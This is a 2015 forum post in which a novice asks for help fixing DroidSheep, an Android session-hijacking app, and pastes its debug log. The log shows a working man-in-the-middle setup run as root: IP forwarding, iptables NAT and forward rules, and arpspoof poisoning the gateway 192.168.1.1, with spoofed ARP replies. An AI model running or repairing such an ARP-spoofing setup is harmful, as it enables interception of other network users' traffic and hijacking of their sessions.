FORUMS

[Q] Droidsheep issues

1 posts
Thanks Meter: 0
 
By Moose2001, Junior Member on 9th June 2015, 04:00 AM
Post Reply Subscribe to Thread Email Thread
Hey guys I am kind of a noon when it comes to rooting and debugging can some help me fix droidsheep
Here is the debugging code:
DEBUG SESSION START! Mon Jun 08 18:21:13 PDT 2015
Droidsheep path: /data/data/de.trier.infsec.koch.droidsheep/files/droidsheep
ARPSPoof Path: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof
Testing SU

BusyBox v1.23.2 (2015-03-30 10:55:10 ICT) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2012.
Licensed under GPLv2. See source distribution for detailed
copyright notices.

Usage: busybox [function [arguments]...]
or: busybox --list[-full]
or: busybox --install [-s] [DIR]
or: function [arguments]...

BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as.

Currently defined functions:
[, [[, ash, awk, base64, basename, blkid, bunzip2, bzcat, bzip2, cal,
cat, chat, chattr, chgrp, chmod, chown, chroot, chrt, cksum, comm, cp,
crond, crontab, cut, date, dd, depmod, devmem, df, diff, dirname,
dmesg, dnsd, dnsdomainname, dos2unix, du, echo, egrep, env, ether-wake,
expand, expr, fakeidentd, fatattr, fbset, fdflush, fdformat, fgrep,
find, fold, free, freeramdisk, fsck, fstrim, fsync, ftpd, ftpget,
ftpput, fuser, getopt, grep, groups, gunzip, gzip, hd, head, hexdump,
hostid, hostname, httpd, hwclock, id, ifconfig, ifenslave, inotifyd,
insmod, install, ionice, iostat, ip, ipaddr, ipcalc, iplink, iproute,
iprule, iptunnel, kill, killall, killall5, last, less, ln, logname,
losetup, ls, lsattr, lsmod, lsof, lsusb, lzop, lzopcat, md5sum,
microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.vfat, mknod,
mkswap, modinfo, modprobe, more, mount, mountpoint, mt, mv, nameif,
nanddump, nandwrite, nc, netstat, nice, nmeter, nohup, nslookup, ntpd,
od, patch, pgrep, pidof, ping, pkill, pmap, powertop, printenv, printf,
ps, pscan, pwd, rdate, rdev, readahead, readlink, realpath, renice,
rev, rfkill, rm, rmdir, rmmod, route, run-parts, script, scriptreplay,
sed, seq, setsid, sh, sha1sum, sha256sum, sha3sum, sha512sum, shuf,
sleep, smemcap, sort, split, start-stop-daemon, stat, strings, stty,
sum, swapoff, swapon, sync, sysctl, tac, tail, tar, tee, telnet,
telnetd, test, tftp, tftpd, time, timeout, top, touch, tr, traceroute,
tty, ttysize, tunctl, umount, uname, uncompress, unexpand, uniq,
unix2dos, unlink, unlzop, unzip, uptime, users, usleep, uudecode,
uuencode, vconfig, vi, watch, wc, wget, which, who, whoami, whois,
xargs, zcat


-rwxrwxrwx app_89 app_89 116992 2015-06-08 18:21 droidsheep

-rwxrwxrwx app_89 app_89 32256 2015-06-08 18:21 arpspoof
executing command: chmod 777 /data/data/de.trier.infsec.koch.droidsheep/files/droidsheep
executing command: chmod 777 /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof
executing command: killall droidsheep

executing command: chmod 777 /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof
executing command: chmod 777 /data/data/de.trier.infsec.koch.droidsheep/files/droidsheep
Error with command: chmod 777 /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof: killall: droidsheep: no process killed
executing command: echo 1 > /proc/sys/net/ipv4/ip_forward
executing command: iptables -F
executing command: /data/data/de.trier.infsec.koch.droidsheep/files/droidsheep
executing command: iptables -t nat -F
executing command: iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE
executing command: iptables -P FORWARD ACCEPT
executing command: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof -s 1 -i wlan0 192.168.1.1
command: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof -s 1 -i wlan0 192.168.1.1line: e0:b9:a5:a:82:3e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.1.1 is-at e0:b9:a5:a:82:3e
command: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof -s 1 -i wlan0 192.168.1.1line: e0:b9:a5:a:82:3e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.1.1 is-at e0:b9:a5:a:82:3e
command: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof -s 1 -i wlan0 192.168.1.1line: e0:b9:a5:a:82:3e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.1.1 is-at e0:b9:a5:a:82:3e
command: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof -s 1 -i wlan0 192.168.1.1line: e0:b9:a5:a:82:3e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.1.1 is-at e0:b9:a5:a:82:3e
command: /data/data/de.trier.infsec.koch.droidsheep/files/arpspoof -s 1 -i wlan0 192.168.1.1line: e0:b9:a5:a:82:3e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.1.1 is-at e0:b9:a5:a:82:3e
 
 
Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools
Display Modes